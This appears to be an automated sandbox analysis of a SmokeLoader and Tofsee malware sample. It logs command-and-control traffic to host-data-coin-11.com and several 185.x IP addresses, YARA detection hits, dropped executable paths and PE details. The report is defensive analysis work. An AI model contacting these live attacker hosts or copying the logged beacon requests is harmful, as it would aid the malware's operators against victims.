Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 09 Jan 2022 17:47:16 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 09 Jan 2022 17:47:18 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:48:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 02 e9 1a d1 70 ae 59 4a d9 52 a6 be 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e7 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOjpYJRg%XQAc}yc0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:48:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:48:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4c ed ac 8c 70 bc 57 dd 43 d1 fc 2e 8d 25 ee c3 93 58 2a e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9LpWC.%X*c0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:48:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:48:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:48:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:48:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 85 4f 13 25 1e e9 e9 df b7 82 16 95 2d ec 0d 0a 30 0d 0a 0d 0a Data Ascii: 22I:82OO%-0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:48:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 e5 a0 8f 70 bc 57 dd 43 d1 fd 20 82 22 ed c3 90 55 2a e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC "U*c0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:49:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:49:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Source: unknown	TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown	TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown	TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fxrkgvik.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: host-data-coin-11.com

Source: unknown	HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.3:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 67.199.248.10:443 -> 192.168.2.3:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 67.199.248.14:443 -> 192.168.2.3:49876 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 3.2.cz2ZyeL2Zd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cz2ZyeL2Zd.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.cz2ZyeL2Zd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.icgujuh.2c315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.cz2ZyeL2Zd.exe.2dc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.icgujuh.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cz2ZyeL2Zd.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.icgujuh.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.cz2ZyeL2Zd.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.328560589.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.398652642.00000000023A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.377828277.0000000000680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.328581526.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.377862377.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.398263748.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.316265354.0000000002E01000.00000020.00020000.sdmp, type: MEMORY

Source: EC9F.exe, 00000017.00000002.413041502.0000000002E2A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Tofsee

Show sources

Source: Yara match	File source: 26.2.2B8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.2B8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.2B8.exe.47c0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.2B8.exe.47e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000003.426261967.00000000047E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.462876681.00000000047C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.461892339.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2B8.exe PID: 5780, type: MEMORYSTR

System Summary:

PE file has a writeable .text section

Show sources

Source: B729.exe.13.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_2_00402A5F	3_2_00402A5F
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_2_00402AB3	3_2_00402AB3
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_1_00402A5F	3_1_00402A5F
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_1_00402AB3	3_1_00402AB3
Source: C:\Users\user\AppData\Roaming\icgujuh	Code function: 18_2_00402A5F	18_2_00402A5F
Source: C:\Users\user\AppData\Roaming\icgujuh	Code function: 18_2_00402AB3	18_2_00402AB3
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_004027CA	22_2_004027CA
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_00401FF1	22_2_00401FF1
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_0040158E	22_2_0040158E
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_004015A6	22_2_004015A6
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_004015BC	22_2_004015BC
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_00436340	22_2_00436340
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_00435560	22_2_00435560
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_005815DE	22_2_005815DE
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_005815F6	22_2_005815F6
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_0058160C	22_2_0058160C
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_00410800	23_2_00410800
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_00411280	23_2_00411280
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_004103F0	23_2_004103F0
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_004109F0	23_2_004109F0
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D314D0	23_2_02D314D0
